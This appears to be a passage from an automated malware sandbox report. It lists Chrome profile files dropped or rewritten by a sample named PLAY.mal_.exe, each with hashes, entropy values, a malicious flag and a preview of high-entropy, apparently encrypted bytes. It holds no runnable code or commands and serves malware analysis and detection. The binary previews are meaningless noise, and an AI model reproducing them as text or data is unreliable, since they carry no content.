        Preview:...Vz...O.tT)SH.e...>.....R0p...g9P.M.I..y..\O.....0X...b..<......$#....`.K.d.P@Y).d.#.JJ.v.T..L....K.n3D.H..tO..........O..Y.<.6.P.....E.bi.,.f^..1..?r.3..j....+..(.}....E..{...A...K..q........'.'l...`......Mi.G...m.`....X5..-C.....p.<..-}d.h|X...!j.?/.2..........,..L=@...0..N......h(,.eW..Y.ng.P.OG.....xj.(h.."xYD.k.6.X.ypf...(....6K.;.Jl7.m..).....nT.3.h......T..U.|.!.I>..........................V4U&....r\....!..i@...<..S..".DBm.q2..<k..............r..@....9|..2......G................./.t\.g....w.i..p.s[..7./o....+.......(.b`..u.rD.x|V...N.!.)...h.....O..}.s'....G....Q.M...'F.D..8axX...M.1.d.....N/.5au2.i.^...../Q.[.#...YZ^)J.aF..........]i..]fl%.{0.P...H......)....|...9.p.R..G....|sVz.*.T .........T..s......%...Lg.+(E_..2f..C...d.G.t..\Z.w.x-Rg.DF&`z,.}u.......6..Y..../........G.1..E..<..I....]1...Jpb...<.4...e.Q....c..f/.e[4B....jg;......;..U......"Y2g..w..`RT.|...O|$2......K.)-ZU...:.....9..Q.g'..Xa.o:w~.!#...D..u.)...l.{3

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\f5205d5c99120fa5_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1288
        Entropy (8bit):7.860157325009502
        Encrypted:false
        SSDEEP:
        MD5:E7C8F5EFE830E9153381C136B0622D5D
        SHA1:D4B81C23A6A9355452187D86697322C5FA8832A5
        SHA-256:3B2EC409624DA54448211348F0E3C0077051709CD312086FD4ABB817D1DB137E
        SHA-512:0DEB7D1356E5693B912365C06B3AAAAAE6EE6FED0391EB93DF11217CC04791935D4DC2C8F02300321263E93CBC8FB89BA7B6CCCDEF3702AA77334A02D353EFBC
        Malicious:false
        Preview:.!Dx..2Z.R.2..Y9.f/q..\..2}.....G....|0..|7..D+.;.A9..w....tN.....s..o..v.Jw...[.b.I. .K8.O...L...<Q..v!....3.t..[.g...3...Ru...R=.8...g..7(..mUk.M...f.C.6K.>,..........v..<a.'...]...-.j..b../%.y:.WI..8.."2..`.X.S/P..A...T..U.|.!.I>..........................O..'X...mk.. F...]..._..=...0.M..mW....B:n....J..6.w.K..W...D.#.N!Jb..36|p.D.;...~j......7.8.7...8.`p.;.w|...A.=".1..f.$.{.m...T.'A.Uu..*......n.e..k....l.'.s..x..|.....n....i?|...........*.B(..!^I..z.}(.-...J.h....q/...&...J@"h.o..9..^k.e0lL.S.<...M.......%6.;...C.....4._/.e....d..8@@..65.n.ga...F......f..{.ZkD....N-.6.h...{..m.`...15..=...2:a. .F.CyR..STTd...G..Y.Y.V......1..{..\o.3.....0.....@Tx?....Ar[.!.... .}.K.b...2.].1./T..n...q..q.".m..I...z.4...[0V..@..n..X.@...p..>.o.3..3).T5....=.8.M.^.."XXz.R..p\.]..b\uK....G...1q.#a.g..y......K). .tw.].?.F\...0.|.6.?....E..WF%.e..+........2LOx.5..4.-%..O..gjJ.As.a..^.'jU.l...l.<h.K...+...]\>..qG....p..Ju..k)..x.}.~...a....#.2....XY./..d.h

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fc9785cdcbaea0b7_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):123448
        Entropy (8bit):7.998548567416478
        Encrypted:true
        SSDEEP:
        MD5:60B55F3C39D7C539CB7C366FECA6E690
        SHA1:5BD0BFFAEBC3C499C28A3078258DEDFFA5CBF630
        SHA-256:344C0D9974D3198C9A7A14124655A45A384FE88226246A7AEFD35CC6DD4C5620
        SHA-512:5EBF9DFDE4EF74DAF0807BDA01B8105997A115639AEAC348B6697721C7AB0290DC67CDCB90DA191A41AFAE79BD91CEFD8345D4A4C7DAA1CE3DF1C6E899C9D60C
        Malicious:true
        Preview:y.v-iI..+............D.A..J.g.4.#.`....,s"'1..g.n-f3^."S;.U.2yB.]....$...t.!.,.].....R..MQ...9..x.../.k{.t..K{B#..>..&.2.jx.5..}.].....Sy..~......L.BV...j...M....I....<......Z.m...ix0Q0..#.]..S...K...z.?...s....UT........d...ZB..T.-d.bG..z.3..q.3N#}:.........N?vf.d..pSl.....&Z)...yYSi...s!3cO.....&.P. .K....g.gp2.r...n...yGB.dFh+....*..y.>.:G.}.k.(.4LE...@..v..3...b.p.F...6).t>....(xT...TB.[.}..N.}.DQ.&..4"...)....3....C;.(..........S..m.M.z...9.g.u......N...Q .....`::\.|...S..#]..-6......v*.B...T.';..G[s`.we3>'.p...........p`Zz...m..NBe.gN...X..`.7P.P.e.......Bb<.....i?..4...i.n..k{..]........L.{...T.v^...9..+.u...~.Ta.v.|\?.....u..#G.......W.A(~G .^.o......j..i.^u3.Z..HK-.C.o........$.....2t.qA`.J.T#z^...B>.?....0 E}QDW....[..t7....4.g.p3...d.....xHb...:Y.{z|..@..s...t.M].>.h.g.....Ap...oC;.$.a..?;..C.sz..r1KG...T.G;5C.Jpk.7.^.*.l{.M......\TT0....t9...]H.q1(8.X_.vi.).N....S..]...lo.nT........,Y..;...yX.X.....q.+_.....m.*N..J....Z1v.)T.E.,d

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fd193f77dd25e1a1_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1304
        Entropy (8bit):7.815012355006923
        Encrypted:false
        SSDEEP:
        MD5:0873C6A2C69D20AA981B122FBB5E1068
        SHA1:567B3B579293B9EE3C6AD6BD184A81173B44B3D3
        SHA-256:A6A4D742245194693C98F40C591850DFB6AFC7BB9CD19FD08A0690F29C4DA4B7
        SHA-512:B2F9FB0D0D697C4302619EEDD5ADC698BF7671E629067D8FCEC2F3C9CE79C538F1F5EBE99869532BD2BF5BE4F73208DA7B6D1D8EE835EE152B9784344FB2C28D
        Malicious:false
        Preview:Lz2G...U!...A..U....NGT..@n|.[.1.H/..t".E..4.4.{"h(+. q0?}Vs..J.c.'...9.......{......@o0.Uq..~..q...l..;......h.....B.Ub...........r.....J.C.i~.x...J.9._....u...n...*.XX)c...{,....B..6mY.u.d.d..KF..s....[..*?#W>...8....Y...r.Lt.W...T..U.|.!.I>..........................3...._yy&)......P..e+.h......,>._P...Q-...2A..'m..@.!Z.........O....IF..+z.....$M.....Y.X....,..=...:.#..Q.[j.....Tg.[.x...e.....*.l.;....x..,...P.........:.(.M.u1w......9.{4...:#....E_....I.......^...ZM.%..th/9.@........D.x.L.p...|......x8..l...c..V[......d...<......o..s...`3y.6...6.?X~kG..hv&.0....9.qg......{B..x6..Ec;DCx.6..>..L../.Z..@...J|..6(.|.YY4...K.N.*!..zSQ.@?.jV..........NCw....Z.....2..V.j.4.j..b*....m....s....O....|?)t...d9.>...s..... .2.h3.. p.5Yy..+ZeG..R.......*?(....Lr...\.....f.BZ.)_.j.......41.!...U.U....e......C....;..7..!..L...n..\&..L.y~.k.....%..[v{N...[F.C.....t.].7...%'6.......4.lC.".>!.4t..)#..!.....q].ET.Nq.z...Q.R.z.".%!...9S..B....f...G).Q.P"R..."

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fee6704ec67d5ed1_0

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1432
        Entropy (8bit):7.849284269758995
        Encrypted:false
        SSDEEP:
        MD5:0217E56BE3D8B9090B307FEE447E9EB8
        SHA1:F13559A4978090DFD1E544E0C1FDA335E7CD76FE
        SHA-256:479509D405E36D22721648D042E051FDBF5DD90BC1F96D77478B986DC053FB5B
        SHA-512:DBEA42A319FE0F3D66461B404D821DFB8E27F8ECA144834E6245FE839B773BE2C330A03D6DB28581E7C824FB90B56C50FBF2307F34887E8116DBDCE9B54479F5
        Malicious:false
        Preview:..MW]..$.V...&.`.....Sm0.t.R..oF........+....D=..oT..(-..U.h.........^..q.W...x....+.&.D.{.]..+-.Qu.y@_.y.b..i..;..........?5.......U.gI..........!....~A...<.DM...&HqXeM....H>r.o..i.p........~(.Pp_R.c5_*;.A..@.I.0a.u.,~...~.c/..+....CD..H...#..x.L........~)../.k.}.v.N@G...]....ja ......U..Z.......t...9X.?.'/...p>#T....o....M.:#N....&&....@2.^E......T..U.|.!.I>...........................C.....;. ..W...:+d..4..?.T|r...w.. 6.Nq..;...._WV..a.Te....{`C.L....d&....TA.%/.4S%..4.ojb...m...;.L;u.Oe$.....#PS....`fh.5 t?..}f..u.2..+0....>.d.....]T& v..`...."yC,+CZC..Es....{8.q....z(..u!.^..b:p|.-:c.A#hVD.mu.A].y.......N&(.........-u..fl.}..*..F..o..^.B..r......F].....S.P./=-S.9.@...0dc.k.....M....u..C.h....%.$:..Q[..D.*.U..xFX;.\3S]...#C.......H.fY..Q...(..zF....w.......#..`y..!&.K..3.?.>..o......LXV}.(.[.:#.V2z..-..wT%..!]...a..k...1...l....l...3.......=0.4'l.E$_..u?+EI.xX..].@...P..[S..e{.U.Yd..Wd.GFOY.bF....ie.Y.7.@...!..nI.O.kz..x".7PAl..!.....D ......#,y

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:PGP\011Secret Key -
        Category:dropped
        Size (bytes):1096
        Entropy (8bit):7.782913551200005
        Encrypted:false
        SSDEEP:
        MD5:735B4A7E8E6B76CCEC360750D8F5AA4C
        SHA1:CA443089E40F6AA05D9D8F7B4CC63704C0FD8843
        SHA-256:4F6DA18857C31923EDF8AE96057C6AFF87A2207FF009F24B15926F820B6F8B9D
        SHA-512:0E605123564F115B88FB22F8DD03D242D58ADB51E77EBD5E48162BD1E8BD2DB203E3FE82CB9CC3FB24A1CFE654E2E1266BA4C8D28578C43F5645FEF08645FD8A
        Malicious:false
        Preview:......l...^.-....+...~Q...J[gA...T..U.|.!.I>..............................s..p.H.....$.....0..^..h......b.+w.P(M0......d..H8.Y..]A.1.1...D...,~..{.q...:+...E..p.L...>..4`.?j.]U.b.G.......xR..uq.J..G...j.J....6...r..l=.=y......{...Nz...hu...w...Dq....1V\6..p7..7`.:..]...S[..V.X.B.......w.@..E.i...}|.N>i.$.<.Y+F.D.P#t..L...M.}D...+A......,j...'J...!....F...+.......].f..c.//F;.K.w......{.....'.A4..J%..QB..)7..M.C..}.......;._p.T.Q.q...q.@..+jE...7......o...W."...+*..-.....o.....M..(.._..>A/.L.W..........="...z.....k..>.(.....3...y.j.6)-.ju.s>xC?.....v.NWO...tl.......n..QO..........b.A4....'5..<......g....K.."......>L...2...j..H-"...TL......M{...j(.W....>.!.(.W8:..F......2..cZ......=....n..."..~01Md....t....A+.J...tU<........b.^[.........O..n..T.......#.5.>?...TW.[).j...F...~..Z...N!.k..u..4D..Sy.........Y..By..q.q.N.2.T..?&6y..F.(..ds.j..A....2.l.......;......x.1.}..4..V..<.KQA..a.............A[.....%.....6..m....j.../PL

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2472
        Entropy (8bit):7.918397205752872
        Encrypted:false
        SSDEEP:
        MD5:52450C7D58698BC47EA5AD032D9487C0
        SHA1:BFD16D9F0C1AB91FA920072CE10EBB344740B63D
        SHA-256:98FCB9DBD48059CC38989EE3E9F4D3D45474B77BDBAB0DE77C4E50FD68DCA902
        SHA-512:70ECEBAC5020609F04B222B78FBC41C084C976BFC52C1E84AE37E70C361434F30EC45CF0236DF6AFC49BD257CE299509C23C4ACD7283312BC351F8A205EE22F0
        Malicious:false
        Preview:....i...'&v...........T.!S...).M.VM.o....\B.I.x..j....2.....e.b~.>G......O*~.I.............m.^.......v.:...KvA...X.5;X...^++.'z5.......r)'uT.n.....[.\.dGt']..0.z.Ay....H.......l..P......i9...=.^.(U.#...E...z*...:..nU.!....PX....V.Y....b..BV.`[.Y.T.R...L_.&...Q.P.B.g.\.R.u..jR.v^..5...U3n_.-.K.#yP.....Wp..9..W..W...*l.rY.....[Cm.<.\.Q.~..'...7:...4{...=.D............I.......S...~.c..+.Z".......U.\..v.........6.."......D.B..#$..........g.. ...{..x*M....X.4.e...)E&.|\..wD./.G,.y"x..:..ge...5[..J.l.i.j.......^.*j{.Jg.,....Cu....>G.t..P6SY....egl.)g7..\.j...9.@........O..M..A.. .....y.#b.)...C..h.....X.......}.6...\.N..V.........~P...c..,W%.*.@_6..He...W.I......(@..;.C..d..>nW}..l6...d...y.....-~.J....W?.,.W..=..d].z\i...a...XAO.U.........Ox~p,fX....R.{....(-.o]O2...v.*#..s.....2.9kx............x.K.4..-.. ...^..S...+..1v.iy7%_..<<..J!.m6Sl.]e..Fh6............@..n.......}.7.8I....6(.z.1..D..-.+...?.8..*RMp.......G....H.@.G.C..K..(..Y%v....B>..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1096
        Entropy (8bit):7.797217009264095
        Encrypted:false
        SSDEEP:
        MD5:0ED9C4B8CDB1808AC66D4CFF5745E7F8
        SHA1:5D5A2AC07C0457D9061CB2F38CB2280EC4EF4410
        SHA-256:50FB878073A4F7DF4E528F8A3BF87B6B458BFEE38B57C347D4B3F498AA0E2628
        SHA-512:C5809206E6A4F232FA7AE6C15A86B1ADD155E12CD9CB90958A8235617D81B4FA7B0127890072674A18BA9FA0A61926ED814B7706EF5B8E4EC0F2A23A56D83E16
        Malicious:false
        Preview:.W.B..;j;-.....#$6.3..e.!.q...y....T..U.|.!.I>................................a.68....b.c$n.....J.e0.a+..1..]z~O.&..V.e...7...;,.&....0..s.....].?..>..7.'........Z4....3..#.S.&....8.....X...8.K.Uy..6...E....z...X.s;E.U[v.....p.e.vJ.....j.x.P..z.l..z.Y..2....;:..$.A.T.[ijX....@...T..Y...zU.....b...........'...f?.....5..<...Aa...G.KB.l....:.x.....I>sB..Ma.4@..+C-hh+..%d...Pa&.....;..I..0........$+a..=\..&..Z....K......#.y.......~O................).....@.f6-.`...D.C....F....R....1h........f...3P{k..K....*[.;`O,vX..*{t..&.M....}i.KM....C.. .c~...[*O.I.....Cy.#lO....H...3.....5...Kj.i....M.<........+.t...a.4z.7r.M.v.[.....`.h..0n..../............V3.ot.A.c.1&w<<<..t.l&.00..u.!,.c..+o(8WC.$.%.....`.$'?..D*3.b....r....W.s.pY....K..>..o....a.R.NP.;...Df.yx....}*;..7.f...}....e#....)CP.Xu..R.QP...x...b.N....Z.Bm..Y_g..,1.....6....da.@W.xdH...k-.fE......B.b8....Mlf...K...1O.A.1.....N.+......LW......FF.Zl....4pR...;.ey.5T.&....5q_fK.1F)..~<....

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\the-real-index

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1128
        Entropy (8bit):7.811367556151153
        Encrypted:false
        SSDEEP:
        MD5:A0FD6DF978A825C0D3B6F5C5C96E0039
        SHA1:83256BE50DF7A7D95F5F684A5F8A9EE5C4EFD7DB
        SHA-256:5E56CB041258C17750EFD2A1E4D67A75B5091AA5F33C9620590937F3740E0FF1
        SHA-512:F5689D90E96EC469C395C05073D1BBB8E90D0149580F2539B3A61255BD6A6081CD9CDF20C6FA413A88A9A93202E9B555C9D86B8BD21B5738339C0606EA010858
        Malicious:false
        Preview:....f.]...... ...i.Q....,..G...%....o.R2.<..]...2Y...b...'.5.$...T..U.|.!.I>..........................n/f.a:Y2$..t<.(j..oa`).......C1.*f.&..xH..".@...xc.N.*.Y.3..k.....0?....>IK).\2p5z.YPOFCp0E1.{p;c..|..Eh.%.7.e...z..%&.0......x....=.2...:.:..-.5..nn......YR^....D<.....Z.$+...vy..xm.,.._....Q....N;.k4..G.24H.bXB....T.d..;.)....V....}p.{5T.S..;..bxH/V..Fq.Ap|Q_.%.o..W..^...2../>..l+l6....kQn._..M...n]+...*z..g.C..e..>!....'..HB!...1k.7..^.......5. >i.....}@..EY./..<....0..D...d.-G.{..q.'.....f......n.S4...G..1....3!..9...b..vkk...6ly.+..=....'..O._I.s..h...~\.T&h....\/.h........$.......*IP.!@....q$..<.g....._.u.qV....._....k*.fA.4.,.d...EIy._.C%f..DU.bd...SR.|....../.|S$+H]D.).89...=..3$z..tu@\V.&..d...*...i..#.C.1..m.t^{K.?.T.|...........8.q..l....D._Z....tM..P..2BA..<.P.u..j.'...........6...f..{<......P..]......<.W....U.+...p..59..'1u..#.....f#...#....2.c=.t.G.S.hz,.?......C.K@...'.N..y.....).4.....1.....l.......4B......9.>..Ok.(g..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DownloadMetadata

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):8248
        Entropy (8bit):7.975594319449011
        Encrypted:false
        SSDEEP:
        MD5:8611076229442312FD1B17E703A323A8
        SHA1:8842EAAD76DB36EA9FC69589DAAE2EFB7BE64B70
        SHA-256:C0494EE583A959D719BC8F1AA8788BB044A0B772F13CE267C3B8A417A8C2DEC9
        SHA-512:0AA0C7693ECEE2CB9CCC28A24EC022320640C110828D87D98E7886431124D1B589840E2818C76D5947CC8D12109F3EF77A28267AEB3D18B8EBA4D286AF27FA8C
        Malicious:false
        Preview:?.r.J...O....m2.U! ....f.O.!z&T.P...H.@[..{..d..%@..?.:....D.1ri....%}....SgYX49..=%.*.-F5}..g.- 5L.z.W.w...g%<.r].bt`.QF?..3I...:.?.G..#.mpJ.x...............7$.......g..T..J_....H.o3=.s./tZ.....4..0.O..=..>.n@~R#./.G~Y.:`.'............YIr...y.h..%L...a...x/$ .:H.?.SZ..pO...kt.S.s.....?...f....3.0\.[.;..h+.f;|.L.<y..+lS6=..... /\*....../...7T..~m..B$)K ..w..9..C.....pe1R......q....'}.%.....<...0}.7<...^..-fA.j[.6.:B0.Z.(H....N..........\F..EZ'...8U.!.."....Y..aRkm..>..=-.v..k.7.....|.....j...zO.P....oV.`K7.fU.8O.%Q..;......b.F...f...d...k.[....s..l...4*Y.:WY*...z...y=.s.+....../N.gQw-4...O...2......GQ....1.u.nd.}R.T..}/...;.:....=..}.)8...:U9..d..m.......R...d~......b..i.W.LF.YN....hL?......,"vS.....;......h..fT..ly.b.)....I...L+..T..[...}...Q.F4.)w*...k4...../.kZ.]..|.Or,.c.{.\....Jx..Z..r&$..]qEW.j....mKV.b...+...;N..tz...(.....{.p...t..#.VS.].......`.R.o........n2.9m....z.}..Z..F...l.6.&.. I .e5@......@..r..B.......

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):21560
        Entropy (8bit):7.990553984125038
        Encrypted:true
        SSDEEP:
        MD5:6C15DA45C3D30849E4A13B8889378999
        SHA1:D7B94D2BBDBDD65AAF5A1D471F913817EE0F2E25
        SHA-256:014F738AB33EACE96EC5D27FECE12C13D135B43C909E35785ADE06A76FDFC819
        SHA-512:2CECFD5A6FDBB094AD87EB120F5FB4A11F81615C11357E217EB8F3F58AB923876CF0B438B4EE188C8FC2503EC6CA91107AB46C42E56225BF12503C550F1BC3A0
        Malicious:true
        Preview:.'].`..]...M....Y..K..................mEJS...x....w.4.*..:U.D.(...mj...........>..-..[....;.2..Z...a.u.X...%.\...'.....l..%.....X.\.,....'f.<9...8..m....4...8a...x.,.BJFI.Hi.@H...<.;.Z.S..~..\.T.6#ej.....Fum/....1..rv..s,hvz.@e....A{....3...F.[..x.(<....{.).....l.......W.b...A...U._..l;.HA......|M@..P..D#............64.\..T.]....?..a...D.k%...J..'84:wrxc.J<7z$Y..OW.Lf.U..""...hf ......H~bbm..].i..[.%..*0....F..2......7Ui..q@W...8]r.C..4Q"....._(......4.a<0.A.....U...p%...f.)sq.%..j....`...T"...........!{.eA/..tn.E`.S.0....1C.q......WV...V...#.j[..\Z\.8.3.....&...........z....v.i..R.6_........i3....7...|n.pg.K.......gF..+b..V.~`..O..}...Z..j.....v..........b&m0.@..+'.;m6.7.#(.5.4{..:.B.........mZ..5.Y-.>:R....h+Z.[K.p...p..lF.1..K.G......O.5>t.......d..|0.1s.^l..G...$7.4.M..f.K..)...AZ..+.'L.L..Vzc.z.i..Xo[.C......W.D..\..v.{2..zAT"F....Y]G.`i....V...u......P.~0Ni......O&..pdl7.CC...&cb.........4..p._.G..g.......D...w..~..`I.T

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1432
        Entropy (8bit):7.8337188091597625
        Encrypted:false
        SSDEEP:
        MD5:867CA6678DE3733C5B92ABF44D5B2052
        SHA1:969AA594069EA33D5725F7233E7C566621261159
        SHA-256:AB6E1805B103517FAF84A4EF8BD31B3D974E6A7FF98A424BEE01DB690AFEC396
        SHA-512:7E88F8009FEB0111F1A86F4BAB3D0018B98D581FE84F1B7BA82C291BCB21DFBFF059015134605913E61B72D3C36E1286A875626329AE5D4F5397936CAC2BB77D
        Malicious:false
        Preview:..!..........G..;." x..x^.6.."..Cy...s.....^...w.}N;..W ]....B.D.$`=...7..c...unp.ih....4KiA\z..%*-'..b..q.*..'..m..Z2..Gtx....>)..z:..?K..1..N..gm..I...;...-.ZG.x...b<.y..aX].}on...D@..*..".y.....$..q.....<49..d.=.......D..]...4~...w.?....\...<b.....M+W.*.....Z....ra.mm......k....ie...z..08......bwA..P.j.....AL....{iJH.x.@...:c.<|v.y.........d....T..U.|.!.I>.............................T.....i.M..9...s.......&..~.`7$.hv...Y.m..6..b...U1a7.jl..Ot.GF.<.-.......&..9..$..\e..y.....W............A.~..H4.+.....:..G!..L...Kvi..~..F"..?...W2[.f. n5...l.Y5.?.O.&..p......<....)h%......d....G..y...Kv[......Y.`..g.lOLLw.....Sf.@.(.....A..K.l...|.mh.%..........~.........(..].._z.-.6.v..Yf..?...c.6.[..!1.g.....i...........!B....K..........+4......].3.f.4....e..@Z...:.......g....,s...6..0<=y.:...~.[I..p.q.O..h.p.......5.... ?....%.Kvi..4.tEe...i{KVt.w...@6|^.C.z?.d..T3.l.1.,e..<.c.|.k.t..%..3H...\..uy.c..-f..q....9..y+....ZI...S>.....S..6V...4.Y...b..v.."

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENT

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1096
        Entropy (8bit):7.781484319673994
        Encrypted:false
        SSDEEP:
        MD5:FE52C6267D4C4EE9370BD76B34185B06
        SHA1:998A89E6D31AFD6EFB529F1AA0C294BB636B790C
        SHA-256:D1A43051F0760F6D4E2F1DB986CA1815392BE42B5F3D10143A2CC689B257D33D
        SHA-512:CBFEA84008FF12E9387C2D3CB19344218A1FEF1AA76EF6575B1B9A3ACBA1D220FD6FDC31792CE6D59EF6E759731A1065040D05B9D40082C83457385F03214772
        Malicious:false
        Preview:.z...n.5.x...]...@??...R...(C...T..U.|.!.I>..........................T.]+UQw......#2\x....4..........w...ld...5....%.5S7..bC...J.Ue....7.....+U.../.G..Z ....iZ..}....i..."....Z.w...%...ry).r.al..0.T..m..N.G.x...6N..n...u."..e..05.`.?E\......g.....wu....x8.(".."..5..\%...... U6....(=^.._...W{..~]\...s2.'6.%0.n.\..._}0....v......<!.d...'.@lE..|..kd....K.].......O'..z..Wc&&.!Z`.$...T.HUp.T.J.A....Y..]F/...>..q(.....5.u.......t.s..g.`...?Jc(p......;&\..V!.UI%,...m.E.dG-.B,!.r1G.Q....z.=.....UF0..|f.W..q}...Z..\V...R{.p.......z.P.....pr..........#.....8.#.0...G).HFn7...-.w[u.......-sv>..3...n.I.......3I!j...2..^uI.%...W.o.gI.'..".."..b.....f.h.w...,Z...%....P...\)M8.E.,..1..[.".B.]........].. X.b...F...x..T.1.....<.xBF..OYD...V.i..hO...Kc........!.%9.k.M..=bJ......z....^{....>d...o...._.~y..O.R..Z.."..VT.<.nS=.0T......#.........;...uq. ...=.i.{...u.GyN.b.a. ....A50...]#...G.....3..I^g........p..w..b45F.C.W...f..B.0..RO.?.=.....z....PC.....o"..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1384
        Entropy (8bit):7.861536250418777
        Encrypted:false
        SSDEEP:
        MD5:E8EDBF7404EA5D2C0972436A8F1C1AF0
        SHA1:46ED963FE1057C3E22030AEF0AFE8CC3D9382008
        SHA-256:97386E119B8798CB9F03790F7268BD58DBBF7377E57BABBA7FC32C1482EB7067
        SHA-512:DE767DA20CA11EB33584EBDA9ED30E69EFA551BA50CA1E4B28541CBFE7280DBA17750FB2E3879169BA44B3F9ED5A2D2C0CEF6BBDDC5FCFAD4B34CB3906E50683
        Malicious:false
        Preview:._D3_.%......C..3.....q....p..B..$..Mn9%.A....;..zYg..0t.Z.........E.t.|..%........R.f=7Y..........RDw.w.-=.."&.,.q9.....a&U.....]{...o..d.PD.......$*...z.#...L>.+b.=......b0....0.0.v....n...6..d......m.=.F)..4r;q-....2<....K.:.@g....~.k.a..Iq..h2w.c`..\..Y..6...qP.....z.$.4..\..u...+..f.a.gq.z..T..U.|.!.I>............................p..'..*.U ...z.k.).y...{..x......T.6.4....Q"u...nl...._....*?..n...........^"h2.0.:`.t...H..%..@......7c..Y...6... s....d^....m}e&...[l.H..g2.QL."......|5.PqC..............f.....w[{....L..C........-_d... .7./.I..V....)...v.Y..yTv.Wd"An.uh..4.X..=)..R\.?..../..4........,..6..D.J..R..6.b..'..q!..b..U.A.#'...k.i..Cz...M......l~.'..$8....1....`..%...G.^..}dX^..}}(OW..rL....P...Tj."c.a./.\..k..N@@..H..HZx..+.G.......#...@...?..#J..'....(lnm...i...l....p...*.V....j7wS..n........C...D.I^..........ON...[..b..1i+..A..A...1.p.:a..A0..F......W;.F..9 ..u....7D........w...t.~.H...v.=...EJ:9mL..J..{.IxT..

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG.old

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1384
        Entropy (8bit):7.870044499199952
        Encrypted:false
        SSDEEP:
        MD5:EF85AF2C667BC5FF21D8AB2BF864C492
        SHA1:356F1EA618457ADF9535BCBBE855DEB5F9720AE6
        SHA-256:72C9A4E99384208C9A9D3C0A285B554DCBB837AAC89F96B0E6F84B5E3B5842F2
        SHA-512:DA9D60109D1D3326AC0F2C3B27BD932ED6B87ECBF8BBDA63C5BF53AD4229CCD324CE03009DBF1D937F0A1C49724EB3F3FF0C02BEF15C0173A4CF5B83D0D83A76
        Malicious:false
        Preview:a.!_..*..{..=Qq-pqgF..~1". e.-.2...A.w........\.^.cDc...%,.......]....5b...I.}.C.Qh%..4t]....8...t..C.....$.J.=jQ.._...=@...H2./.:..[..~.5...W.K&.. ....xQ.X.......S..m....A..K..d.......k....+^{.....\.-bDQ.j..O..P|.w}_A... .>.......2.Sv..j...;...]..0...T.....e..DX....lTq..u}>.... 8u#.....fl9F0...w.<..c.D..;...T..U.|.!.I>............................N.(..5o..Y....!..7..@...}R..z....4.w...S..7v.....D..).p....R. ..]..........i._......*G..C...j8E.iu9,....*..CIm.............6..).........`C..&......~.Im...U.{........2..>.........[....1...-.]..".D..yx.....t.A.^.g....Q..0.;.@Z/(H!..D..nH.%...<...A.k&J...'...G..w.z.n.^....A..._+<{.>.G|...Q.[Tg....'._.|.7.1..w..~.3p.q...h.a ..iH...O.W...j......aj.H..f."R/.Q..J.@S....%O.....M.v..2..6.%..5...9'9...../.qY.p<]....){{.P..X6.U..c#p...X.#.)tI.1f..:.3@P....}..l.K.....Cx...(.6e?d.!~....Y....H.${c..}.@Xj..B.......mM2.>R.\):.>.x.'m..?k.j...Ib...~....d.uP.Q.E...P....T.$......V..r.@.d.0.Y.I%...2..e.... ......?...

        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1112
        Entropy (8bit):7.811722390201178
        Encrypted:false
        SSDEEP:
        MD5:226DA237662763252C7F19E00AF13479
        SHA1:24978272AAF2EA779868BD3A842748B5ABE437BA
        SHA-256:BE67014E9F87C040FB88ADD9D8215F8687069A733F368F40026FEFA85C9AA61C
        SHA-512:7283C93AE1F667FAC05DE559AD1B63825C690EB28D1BF1DC4CE43577C078E6E441383117DFED0F94D9FA58F6F41DBE23C76648E743BAEFF92AD7F7930F7184AD
        Malicious:false
